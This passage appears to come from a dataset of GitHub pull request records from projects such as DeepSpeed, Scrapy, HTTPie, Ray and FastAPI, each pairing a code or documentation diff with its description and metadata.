def is_synchronized_device(self):
return False
+ def use_host_timers(self):
+ return self.is_synchronized_device()
+
+ def resolves_data_dependency(self):
+ return self.is_synchronized_device()
+
+ def handles_memory_backpressure(self):
+ return self.is_synchronized_device()
+
# Device APIs
def device_name(self, device_index=None):
if device_index is None:
diff --git a/tests/unit/accelerator/test_accelerator.py b/tests/unit/accelerator/test_accelerator.py
new file mode 100644
index 000000000000..964cf2b24f4e
--- /dev/null
+++ b/tests/unit/accelerator/test_accelerator.py
@@ -0,0 +1,59 @@
+# Copyright (c) Microsoft Corporation.
+# SPDX-License-Identifier: Apache-2.0
+
+# DeepSpeed Team
+
+import pytest
+
+import os
+import sys
+import importlib
+import re
+
+import deepspeed
+
+DS_ACCEL_PATH = "deepspeed.accelerator"
+IGNORE_FILES = ["abstract_accelerator.py", "real_accelerator.py"]
+
+
+@pytest.fixture
+def accel_class_name(module_name):
+ class_list = []
+ mocked_modules = []
+
+ # Get the accelerator class name for a given module
+ while True:
+ try:
+ module = importlib.import_module(module_name)
+ break
+ except ModuleNotFoundError as e:
+ # If the environment is missing a module, mock it so we can still
+ # test importing the accelerator class
+ missing_module = re.search(r"\'(.*)\'", e.msg).group().strip("'")
+ sys.modules[missing_module] = lambda x: None
+ mocked_modules.append(missing_module)
+ for name in dir(module):
+ if name.endswith("_Accelerator"):
+ class_list.append(name)
+
+ assert len(class_list) == 1, f"Multiple accelerator classes found in {module_name}"
+
+ yield class_list[0]
+
+ # Clean up mocked modules so as to not impact other tests
+ for module in mocked_modules:
+ del sys.modules[module]
+
+
+@pytest.mark.parametrize(
+ "module_name",
+ [
+ DS_ACCEL_PATH + "." + f.rstrip(".py") for f in os.listdir(deepspeed.accelerator.__path__[0])
+ if f.endswith("_accelerator.py") and f not in IGNORE_FILES
+ ],
+)
+def test_abstract_methods_defined(module_name, accel_class_name):
+ module = importlib.import_module(module_name)
+ accel_class = getattr(module, accel_class_name)
+ accel_class.__init__ = lambda self: None
+ _ = accel_class()
| #5026 introduced new abstract methods for the base accelerator class. These methods were not defined for `MPS_Accelerator`. Fixes #5132 | https://api.github.com/repos/microsoft/DeepSpeed/pulls/5134 | 2024-02-14T18:55:04Z | 2024-02-14T23:14:24Z | 2024-02-14T23:14:24Z | 2024-02-14T23:14:28Z | 685 | microsoft/DeepSpeed | 10,681 |
[tensor]fix test_linear | diff --git a/colossalai/tensor/_ops/linear.py b/colossalai/tensor/_ops/linear.py
index e75f18609baa..d8bc338a5b43 100644
--- a/colossalai/tensor/_ops/linear.py
+++ b/colossalai/tensor/_ops/linear.py
@@ -19,8 +19,9 @@ def colo_linear(types, args, kwargs, pg):
bias = None
else:
bias = kwargs.get('bias', None)
- if isinstance(bias, ColoTensor):
- bias = bias.torch_tensor()
+
+ if isinstance(bias, ColoTensor):
+ bias = bias.torch_tensor()
# Add communication logic before and after linear call.
if isinstance(weight, ColoTensor):
diff --git a/tests/test_tensor/test_op.py b/tests/test_tensor/test_op.py
index c45dca8da46c..6cd45df447a2 100644
--- a/tests/test_tensor/test_op.py
+++ b/tests/test_tensor/test_op.py
@@ -3,7 +3,6 @@
from colossalai.tensor import ColoTensor
from copy import deepcopy
-
def test_linear():
in_dim = 4
out_dim = 5
@@ -45,7 +44,6 @@ def test_linear():
# torch.nn.init.uniform_(t)
# print(t)
-
def test_element_wise():
t_ref = torch.randn(3, 5)
t = ColoTensor.init_from_torch_tensor(t_ref.clone())
@@ -66,6 +64,11 @@ def test_lazy_init_tensor():
assert lazy_t._torch_tensor == None
assert lazy_t.torch_tensor().numel() == 6
-if __name__ == '__main__':
+def check_all():
+ test_linear()
+ test_element_wise()
test_no_wrap_op()
- # test_element_wise()
+ test_lazy_init_tensor()
+
+if __name__ == '__main__':
+ check_all()
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/826 | 2022-04-21T09:14:25Z | 2022-04-21T09:18:56Z | 2022-04-21T09:18:56Z | 2022-04-21T09:18:56Z | 441 | hpcaitech/ColossalAI | 11,308 |
|
[MRG+1] Enable robots.txt handling by default for new projects. | diff --git a/docs/topics/settings.rst b/docs/topics/settings.rst
index cc070d8c0d7..0959a87a735 100644
--- a/docs/topics/settings.rst
+++ b/docs/topics/settings.rst
@@ -750,8 +750,8 @@ Default: ``60.0``
Scope: ``scrapy.extensions.memusage``
The :ref:`Memory usage extension <topics-extensions-ref-memusage>`
-checks the current memory usage, versus the limits set by
-:setting:`MEMUSAGE_LIMIT_MB` and :setting:`MEMUSAGE_WARNING_MB`,
+checks the current memory usage, versus the limits set by
+:setting:`MEMUSAGE_LIMIT_MB` and :setting:`MEMUSAGE_WARNING_MB`,
at fixed time intervals.
This sets the length of these intervals, in seconds.
@@ -877,7 +877,13 @@ Default: ``False``
Scope: ``scrapy.downloadermiddlewares.robotstxt``
If enabled, Scrapy will respect robots.txt policies. For more information see
-:ref:`topics-dlmw-robots`
+:ref:`topics-dlmw-robots`.
+
+.. note::
+
+ While the default value is ``False`` for historical reasons,
+ this option is enabled by default in settings.py file generated
+ by ``scrapy startproject`` command.
.. setting:: SCHEDULER
@@ -1036,7 +1042,7 @@ TEMPLATES_DIR
Default: ``templates`` dir inside scrapy module
The directory where to look for templates when creating new projects with
-:command:`startproject` command and new spiders with :command:`genspider`
+:command:`startproject` command and new spiders with :command:`genspider`
command.
The project name must not conflict with the name of custom files or directories
diff --git a/scrapy/templates/project/module/settings.py.tmpl b/scrapy/templates/project/module/settings.py.tmpl
index 822812c9aba..f13e8587106 100644
--- a/scrapy/templates/project/module/settings.py.tmpl
+++ b/scrapy/templates/project/module/settings.py.tmpl
@@ -18,6 +18,9 @@ NEWSPIDER_MODULE = '$project_name.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = '$project_name (+http://www.yourdomain.com)'
+# Obey robots.txt rules
+ROBOTSTXT_OBEY = True
+
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
| A proposed fix for #1668.
For backwards-compatibility reasons the default value is not changed: settings for existing projects, or settings used with `CrawlerProcess`, won't change.
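To make the compatibility point concrete, a minimal sketch (illustrative, not from this PR):

```python
from scrapy.crawler import CrawlerProcess

# Settings given to CrawlerProcess are untouched by the template change;
# the library-level default is still ROBOTSTXT_OBEY = False.
process = CrawlerProcess(settings={"ROBOTSTXT_OBEY": True})

# New projects can opt back out by flipping the generated settings.py line:
# ROBOTSTXT_OBEY = False
```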
| https://api.github.com/repos/scrapy/scrapy/pulls/1724 | 2016-01-26T12:48:53Z | 2016-01-26T13:19:15Z | 2016-01-26T13:19:15Z | 2016-01-27T19:48:26Z | 553 | scrapy/scrapy | 34,864 |
[AIRFLOW-XXX] Add Aizhamal Nurmamat kyzy to contributors list | diff --git a/docs/project.rst b/docs/project.rst
index 14f68f438e742..59fa904ea4c2e 100644
--- a/docs/project.rst
+++ b/docs/project.rst
@@ -58,6 +58,7 @@ Committers
- @jmcarp (Joshua Carp)
- @KevinYang21 (Kevin Yang)
- @mik-laj (Kamil Breguła)
+- @aijamalnk (Aizhamal Nurmamat kyzy)
For the full list of contributors, take a look at `Airflow's Github
| Make sure you have checked _all_ steps below.
### Jira
- [ ] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR"
- https://issues.apache.org/jira/browse/AIRFLOW-XXX
- In case you are fixing a typo in the documentation you can prepend your commit with \[AIRFLOW-XXX\], code changes always need a Jira issue.
- In case you are proposing a fundamental code change, you need to create an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)).
- In case you are adding a dependency, check if the license complies with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
### Description
- [ ] Here are some details about my PR, including screenshots of any UI changes:
### Tests
- [ ] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
### Commits
- [ ] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [ ] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to an appropriate release
### Code Quality
- [ ] Passes `flake8`
| https://api.github.com/repos/apache/airflow/pulls/5370 | 2019-06-04T21:30:33Z | 2019-06-06T07:23:46Z | 2019-06-06T07:23:46Z | 2019-06-06T07:23:46Z | 132 | apache/airflow | 14,656 |
[Classifier]: Progress bar for validation | diff --git a/classifier.py b/classifier.py
index c35292a5a07..91281510760 100644
--- a/classifier.py
+++ b/classifier.py
@@ -208,8 +208,11 @@ def train():
def test(model, dataloader, names, criterion=None, verbose=False, pbar=None):
model.eval()
pred, targets, loss = [], [], 0
+ n = len(dataloader) # number of batches
with torch.no_grad():
- for images, labels in dataloader:
+ desc = f'{pbar.desc}validating'
+ bar = tqdm(dataloader, desc, n, False, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}', position=0)
+ for images, labels in bar:
images, labels = resize(images.to(device)), labels.to(device)
y = model(images)
pred.append(torch.max(y, 1)[1])
@@ -221,7 +224,7 @@ def test(model, dataloader, names, criterion=None, verbose=False, pbar=None):
correct = (targets == pred).float()
if pbar:
- pbar.desc += f"{loss / len(dataloader):<12.3g}{correct.mean().item():<12.3g}"
+ pbar.desc += f"{loss / n:<12.3g}{correct.mean().item():<12.3g}"
accuracy = correct.mean().item()
if verbose: # all classes
|
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)</sub>
### 🌟 Summary
Improved progress bar and accuracy reporting in the model validation phase.
### 📊 Key Changes
- Added a variable `n` to store the number of batches in the data loader.
- Implemented a tqdm progress bar for the validation step to provide real-time feedback (see the sketch after this list).
- Adjusted the loss calculation to use the new `n` variable for better code clarity.
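
Below is a stripped-down sketch of the pattern these changes follow (a standalone illustration, not the PR code; `compute_loss` is caller-supplied):

```python
from tqdm import tqdm

def validate(model, dataloader, compute_loss, pbar_desc=""):
    """Minimal validation loop with a tqdm bar; compute_loss is caller-supplied."""
    n = len(dataloader)  # number of batches, reused for the mean loss
    bar = tqdm(dataloader, desc=f"{pbar_desc}validating", total=n, leave=False)
    total_loss = 0.0
    for images, labels in bar:
        total_loss += compute_loss(model, images, labels)
    return total_loss / n  # divide by n, as the PR does
```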
### 🎯 Purpose & Impact
- **Enhanced User Experience:** The addition of a tqdm progress bar makes it easier for users to track the validation process, leading to a more interactive and informative experience. 📈
- **Improved Code Clarity:** Using the `n` variable for the number of batches simplifies how the loss is calculated and reported, reducing potential confusion for maintainers and contributors. 🧐
- **Accurate Metrics Display:** The progress bar now more accurately displays loss and accuracy, resulting in more reliable performance metrics for users. 🔍 | https://api.github.com/repos/ultralytics/yolov5/pulls/8387 | 2022-06-29T02:43:16Z | 2022-06-29T17:00:08Z | 2022-06-29T17:00:08Z | 2024-01-19T09:09:29Z | 335 | ultralytics/yolov5 | 24,951 |
Update installation instructions for debian | diff --git a/docs/README.md b/docs/README.md
index dbab8714ec..d7b8241e08 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -162,6 +162,8 @@ Also works for other Debian-derived distributions like MX Linux, Linux Mint, dee
```bash
# Install httpie
+$ curl -SsL https://packages.httpie.io/deb/KEY.gpg | apt-key add -
+$ curl -SsL -o /etc/apt/sources.list.d/httpie.list https://packages.httpie.io/deb/httpie.list
$ apt update
$ apt install httpie
```
diff --git a/docs/installation/methods.yml b/docs/installation/methods.yml
index 0828b0d603..79c78e3a0c 100644
--- a/docs/installation/methods.yml
+++ b/docs/installation/methods.yml
@@ -36,6 +36,8 @@ tools:
package: https://packages.debian.org/sid/web/httpie
commands:
install:
+ - curl -SsL https://packages.httpie.io/deb/KEY.gpg | apt-key add -
+ - curl -SsL -o /etc/apt/sources.list.d/httpie.list https://packages.httpie.io/deb/httpie.list
- apt update
- apt install httpie
upgrade:
| https://api.github.com/repos/httpie/cli/pulls/1373 | 2022-04-27T13:18:02Z | 2022-05-05T15:40:53Z | 2022-05-05T15:40:53Z | 2022-05-05T15:40:53Z | 304 | httpie/cli | 33,980 |
|
[MRG] Fix typo in SGD documentation | diff --git a/doc/modules/sgd.rst b/doc/modules/sgd.rst
index 7c515d5459cec..e8febda201bf7 100644
--- a/doc/modules/sgd.rst
+++ b/doc/modules/sgd.rst
@@ -279,7 +279,7 @@ Mathematical formulation
========================
Given a set of training examples :math:`(x_1, y_1), \ldots, (x_n, y_n)` where
-:math:`x_i \in \mathbf{R}^n` and :math:`y_i \in \{-1,1\}`, our goal is to
+:math:`x_i \in \mathbf{R}^m` and :math:`y_i \in \{-1,1\}`, our goal is to
learn a linear scoring function :math:`f(x) = w^T x + b` with model parameters
:math:`w \in \mathbf{R}^m` and intercept :math:`b \in \mathbf{R}`. In order
to make predictions, we simply look at the sign of :math:`f(x)`.
|
#### Reference Issue
Fixes #8599
#### What does this implement/fix? Explain your changes.
Fixes what seems to be a typo in the SGD documentation.
`x_i` should be in `R^m`, since `n` is the number of training examples while `m` is the feature dimension (matching `w ∈ R^m`) - better illustrated in the issue ^
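For reference, a restatement of the corrected formulation in the doc's notation (my summary of the diff, not text from the PR):

```latex
% n training examples, each x_i a vector of m features
(x_1, y_1), \ldots, (x_n, y_n), \qquad x_i \in \mathbf{R}^m, \; y_i \in \{-1, 1\}
% w must live in the same space as x_i for w^T x to make sense
f(x) = w^T x + b, \qquad w \in \mathbf{R}^m, \; b \in \mathbf{R}
```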
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/8600 | 2017-03-16T14:12:14Z | 2017-03-16T14:21:43Z | 2017-03-16T14:21:43Z | 2017-03-16T14:21:43Z | 256 | scikit-learn/scikit-learn | 45,963 |
nmcli: Use dbus only if it is present | diff --git a/lib/ansible/modules/network/nmcli.py b/lib/ansible/modules/network/nmcli.py
index 86a844c7ee0309..3571c9a77d1b06 100644
--- a/lib/ansible/modules/network/nmcli.py
+++ b/lib/ansible/modules/network/nmcli.py
@@ -524,7 +524,8 @@ class Nmcli(object):
platform='Generic'
distribution=None
- bus=dbus.SystemBus()
+ if HAVE_DBUS:
+ bus=dbus.SystemBus()
# The following is going to be used in dbus code
DEVTYPES={1: "Ethernet",
2: "Wi-Fi",
| ##### ISSUE TYPE
- Bugfix Pull Request
##### COMPONENT NAME
network/nmcli
##### ANSIBLE VERSION
```
2.2
```
##### SUMMARY
Call the dbus subfunction only if the dbus library is present; otherwise the following error appears:
```
NameError: name 'dbus' is not defined
``` | https://api.github.com/repos/ansible/ansible/pulls/19060 | 2016-12-09T09:51:58Z | 2016-12-09T22:35:55Z | 2016-12-09T22:35:55Z | 2019-04-26T17:40:17Z | 154 | ansible/ansible | 49,425 |
Rolling back #747 | diff --git a/e2e/specs/add_rows.spec.ts b/e2e/specs/add_rows.spec.ts
index e80619b7b150..8dbc64c587de 100644
--- a/e2e/specs/add_rows.spec.ts
+++ b/e2e/specs/add_rows.spec.ts
@@ -35,6 +35,11 @@ describe("st.add_rows", () => {
cy.get(".decoration").invoke("css", "display", "none");
});
+ beforeEach(() => {
+ // Check that the app is fully loaded
+ return cy.get(".element-container").should("have.length", 26);
+ });
+
it("works for all elements that support it", () => {
cy.get(".element-container .stTable").should("have.length", 3);
cy.get(".element-container .stDataFrame").should("have.length", 4);
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-14.snap.png differ
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-15.snap.png differ
diff --git a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png
index 373e92f15c4b..3f85493d4997 100644
Binary files a/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png and b/frontend/cypress/snapshots/linux/2x/add_rows.spec.ts/stVegaLiteChart-16.snap.png differ
diff --git a/lib/streamlit/DeltaGenerator.py b/lib/streamlit/DeltaGenerator.py
index d2aae28f8415..c398f5614c60 100644
--- a/lib/streamlit/DeltaGenerator.py
+++ b/lib/streamlit/DeltaGenerator.py
@@ -1595,7 +1595,7 @@ def _check_and_convert_to_indices(options, default_values):
if not isinstance(default_values, list):
default_values = [default_values]
- for value in default_values:
+ for value in default_values:
if value not in options:
raise StreamlitAPIException(
"Every Multiselect default value must exist in options"
@@ -2550,15 +2550,6 @@ def add_rows(self, data=None, **kwargs):
"Method requires exactly one dataset"
)
- # Regenerate chart with data
- if self._last_index == 0:
- if self._delta_type == 'line_chart':
- self.line_chart(data)
- elif self._delta_type == 'bar_chart':
- self.bar_chart(data)
- elif self._delta_type == 'area_chart':
- self.area_chart(data)
-
data, self._last_index = _maybe_melt_data_for_add_rows(
data, self._delta_type, self._last_index
)
| **Issue:** add_rows was not working well for line_chart, area_chart, and bar_chart
**Description:** Rolling back #747
---
**Contribution License Agreement**
By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
| https://api.github.com/repos/streamlit/streamlit/pulls/765 | 2019-11-29T17:36:03Z | 2019-11-29T19:45:58Z | 2019-11-29T19:45:58Z | 2019-11-29T19:46:02Z | 866 | streamlit/streamlit | 21,635 |
Update team.json | diff --git a/website/src/data/team.json b/website/src/data/team.json
index 50a981fcac..b0df9eab68 100644
--- a/website/src/data/team.json
+++ b/website/src/data/team.json
@@ -88,6 +88,12 @@
"githubURL": "https://github.com/shahules786",
"imageURL": "https://avatars.githubusercontent.com/u/25312635?v=4"
},
+ "gfjam": {
+ "name": "James Melvin Ebenezer",
+ "title": "Full stack and ML Engineer",
+ "githubURL": "https://github.com/melvinebenezer",
+ "imageURL": "https://avatars.githubusercontent.com/u/6395936?s=40&v=4"
+ },
"jmete": {
"name": "James Mete",
"title": "Data Scientist",
@@ -102,7 +108,7 @@
},
{
"name": "Fullstack developers",
- "members": ["fozziethebeat", "AbdBarho", "notmd", "olliestanley"]
+ "members": ["fozziethebeat", "AbdBarho", "notmd", "olliestanley", "gfjam"]
},
{
"name": "ML engineers",
| Added my details to team.json | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/2116 | 2023-03-19T10:07:15Z | 2023-03-19T10:35:03Z | 2023-03-19T10:35:03Z | 2023-03-19T10:35:04Z | 300 | LAION-AI/Open-Assistant | 36,997 |
Fix path_empty() | diff --git a/src/black/__init__.py b/src/black/__init__.py
index 90aad220a9c..d83f0e54a72 100644
--- a/src/black/__init__.py
+++ b/src/black/__init__.py
@@ -506,8 +506,9 @@ def path_empty(
"""
Exit if there is no `src` provided for formatting
"""
- if not src and (verbose or not quiet):
- out(msg)
+ if not src:
+ if verbose or not quiet:
+ out(msg)
ctx.exit(0)
| Behavior other than output shouldn't depend on the verbose/quiet option. As far as I can tell this currently has no visible effect, since code after this function is called handles an empty list gracefully. | https://api.github.com/repos/psf/black/pulls/2275 | 2021-05-29T15:04:08Z | 2021-05-29T16:03:09Z | 2021-05-29T16:03:09Z | 2021-05-29T16:03:12Z | 132 | psf/black | 24,435 |
fix vram problems | diff --git a/fooocus_version.py b/fooocus_version.py
index e12744707..e6e36dd5a 100644
--- a/fooocus_version.py
+++ b/fooocus_version.py
@@ -1 +1 @@
-version = '2.0.65'
+version = '2.0.66'
diff --git a/launch.py b/launch.py
index ef13bee5c..fe32c4d67 100644
--- a/launch.py
+++ b/launch.py
@@ -33,23 +33,6 @@ def prepare_environment():
if REINSTALL_ALL or not is_installed("torch") or not is_installed("torchvision"):
run(f'"{python}" -m {torch_command}', "Installing torch and torchvision", "Couldn't install torch", live=True)
- import torch
-
- def detect_gpu_type():
- if torch.cuda.is_available():
- gpu_name = torch.cuda.get_device_name(0)
- if "NVIDIA" in gpu_name:
- return "NVIDIA GPU"
- elif "Radeon" in gpu_name:
- return "AMD GPU"
- else:
- return "Unknown GPU Type"
- else:
- return "No GPU Available"
-
- gpu_type = detect_gpu_type()
- print("Detected GPU Type:", gpu_type)
-
if REINSTALL_ALL or not is_installed("xformers"):
if platform.system() == "Windows":
if platform.python_version().startswith("3.10"):
@@ -60,7 +43,7 @@ def detect_gpu_type():
"You can also check this and build manually: https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Xformers#building-xformers-on-windows-by-duckness")
if not is_installed("xformers"):
exit(0)
- elif platform.system() == "Linux" and gpu_type == 'NVIDIA GPU':
+ elif platform.system() == "Linux":
run_pip(f"install -U -I --no-deps {xformers_package}", "xformers")
if REINSTALL_ALL or not requirements_met(requirements_file):
diff --git a/modules/launch_util.py b/modules/launch_util.py
index 16cf48e29..71a64ff64 100644
--- a/modules/launch_util.py
+++ b/modules/launch_util.py
@@ -91,9 +91,14 @@ def run(command, desc=None, errdesc=None, custom_env=None, live: bool = default_
def run_pip(command, desc=None, live=default_command_live):
- index_url_line = f' --index-url {index_url}' if index_url != '' else ''
- return run(f'"{python}" -m pip {command} --prefer-binary{index_url_line}', desc=f"Installing {desc}",
- errdesc=f"Couldn't install {desc}", live=live)
+ try:
+ index_url_line = f' --index-url {index_url}' if index_url != '' else ''
+ return run(f'"{python}" -m pip {command} --prefer-binary{index_url_line}', desc=f"Installing {desc}",
+ errdesc=f"Couldn't install {desc}", live=live)
+ except Exception as e:
+ print(e)
+ print(f'CMD Failed {desc}: {command}')
+ return None
re_requirement = re.compile(r"\s*([-_a-zA-Z0-9]+)\s*(?:==\s*([-+_.a-zA-Z0-9]+))?\s*")
| https://api.github.com/repos/lllyasviel/Fooocus/pulls/437 | 2023-09-19T19:10:27Z | 2023-09-19T19:11:42Z | 2023-09-19T19:11:42Z | 2023-09-19T19:11:45Z | 779 | lllyasviel/Fooocus | 7,288 |
|
Cache aliases to speed up subsequent calls and add support for Fish functions | diff --git a/tests/test_shells.py b/tests/test_shells.py
index c08ee67f0..675cdd354 100644
--- a/tests/test_shells.py
+++ b/tests/test_shells.py
@@ -78,6 +78,12 @@ class TestFish(object):
def shell(self):
return shells.Fish()
+ @pytest.fixture(autouse=True)
+ def Popen(self, mocker):
+ mock = mocker.patch('thefuck.shells.Popen')
+ mock.return_value.stdout.read.return_value = (b'funced\nfuncsave\ngrep')
+ return mock
+
@pytest.mark.parametrize('before, after', [
('pwd', 'pwd'),
('ll', 'll')]) # Fish has no aliases but functions
@@ -98,7 +104,9 @@ def test_and_(self, shell):
assert shell.and_('foo', 'bar') == 'foo; and bar'
def test_get_aliases(self, shell):
- assert shell.get_aliases() == {}
+ assert shell.get_aliases() == {'funced': 'funced',
+ 'funcsave': 'funcsave',
+ 'grep': 'grep'}
@pytest.mark.usefixtures('isfile')
diff --git a/thefuck/shells.py b/thefuck/shells.py
index 2749a1c5b..154311c85 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -12,8 +12,10 @@
class Generic(object):
+ _aliases = {}
+
def get_aliases(self):
- return {}
+ return self._aliases
def _expand_aliases(self, command_script):
aliases = self.get_aliases()
@@ -62,11 +64,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('bash -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ if not self._aliases:
+ proc = Popen('bash -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -91,6 +97,15 @@ def app_alias(self):
" end\n"
"end")
+ def get_aliases(self):
+ if not self._aliases:
+ proc = Popen('fish -ic functions', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ functions = proc.stdout.read().decode('utf-8').strip().split('\n')
+ self._aliases = dict((function, function) for function in functions)
+
+ return self._aliases
+
def _get_history_file_name(self):
return os.path.expanduser('~/.config/fish/fish_history')
@@ -112,11 +127,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('zsh -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ if not self._aliases:
+ proc = Popen('zsh -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -135,11 +154,15 @@ def _parse_alias(self, alias):
return name, value
def get_aliases(self):
- proc = Popen('tcsh -ic alias', stdout=PIPE, stderr=DEVNULL, shell=True)
- return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '\t' in alias)
+ if not self._aliases:
+ proc = Popen('tcsh -ic alias', stdout=PIPE, stderr=DEVNULL,
+ shell=True)
+ self._aliases = dict(
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '\t' in alias)
+
+ return self._aliases
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
| @nvbn What do you think?
| https://api.github.com/repos/nvbn/thefuck/pulls/215 | 2015-05-22T02:59:38Z | 2015-05-22T13:55:00Z | 2015-05-22T13:55:00Z | 2015-05-22T18:10:40Z | 1,126 | nvbn/thefuck | 30,884 |
Only delete local object in CoreWorkerPlasmaStoreProvider:::WarmupStore | diff --git a/src/ray/core_worker/store_provider/plasma_store_provider.cc b/src/ray/core_worker/store_provider/plasma_store_provider.cc
index 831f2629a9b1e..a8f1162872284 100644
--- a/src/ray/core_worker/store_provider/plasma_store_provider.cc
+++ b/src/ray/core_worker/store_provider/plasma_store_provider.cc
@@ -429,7 +429,7 @@ Status CoreWorkerPlasmaStoreProvider::WarmupStore() {
RAY_RETURN_NOT_OK(Create(nullptr, 8, object_id, rpc::Address(), &data));
RAY_RETURN_NOT_OK(Seal(object_id));
RAY_RETURN_NOT_OK(Release(object_id));
- RAY_RETURN_NOT_OK(Delete({object_id}, false));
+ RAY_RETURN_NOT_OK(Delete({object_id}, true));
return Status::OK();
}
|
## Why are these changes needed?
This object is only put in the local object store, so there is no need to broadcast the delete request to all raylets.
Otherwise there will be perf issues in a large cluster, because there will be num_nodes * num_workers requests among raylets.
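A rough sense of the fan-out avoided (illustrative cluster sizes, not measurements from this PR):

```python
# Every worker warms up the plasma store once; before this change each of
# those warmup deletes was broadcast instead of handled locally.
num_nodes, num_workers_per_node = 1000, 16  # illustrative cluster size
broadcast_deletes = num_nodes * num_workers_per_node  # the PR's num_nodes * num_workers
print(broadcast_deletes)  # 16000 cluster-wide delete requests avoided
```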
## Related issue number
## Checks
- [ ] I've run `scripts/format.sh` to lint the changes in this PR.
- [ ] I've included any doc changes needed for https://docs.ray.io/en/master/.
- [ ] I've made sure the tests are passing. Note that there might be a few flaky tests, see the recent failures at https://flakey-tests.ray.io/
- Testing Strategy
- [ ] Unit tests
- [ ] Release tests
- [ ] This PR is not tested :(
| https://api.github.com/repos/ray-project/ray/pulls/13788 | 2021-01-29T09:33:11Z | 2021-01-29T12:24:09Z | 2021-01-29T12:24:09Z | 2021-01-29T12:24:12Z | 190 | ray-project/ray | 18,966 |
📌 Pin AnyIO to < 4.0.0 to handle an incompatibility while upgrading to Starlette 0.31.1 | diff --git a/pyproject.toml b/pyproject.toml
index 9b7cca9c95db2..2870b31a5334d 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -44,6 +44,8 @@ dependencies = [
"starlette>=0.27.0,<0.28.0",
"pydantic>=1.7.4,!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,<3.0.0",
"typing-extensions>=4.5.0",
+ # TODO: remove this pin after upgrading Starlette 0.31.1
+ "anyio>=3.7.1,<4.0.0",
]
dynamic = ["version"]
| 📌 Pin AnyIO to < 4.0.0 to handle an incompatibility while upgrading to Starlette 0.31.1 | https://api.github.com/repos/tiangolo/fastapi/pulls/10194 | 2023-09-02T15:16:32Z | 2023-09-02T17:03:44Z | 2023-09-02T17:03:44Z | 2023-09-02T17:03:44Z | 190 | tiangolo/fastapi | 23,193 |
Adding experimental_rerun | diff --git a/e2e/scripts/st_experimental_rerun.py b/e2e/scripts/st_experimental_rerun.py
new file mode 100644
index 000000000000..baf2719c10aa
--- /dev/null
+++ b/e2e/scripts/st_experimental_rerun.py
@@ -0,0 +1,30 @@
+# Copyright 2018-2020 Streamlit Inc.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
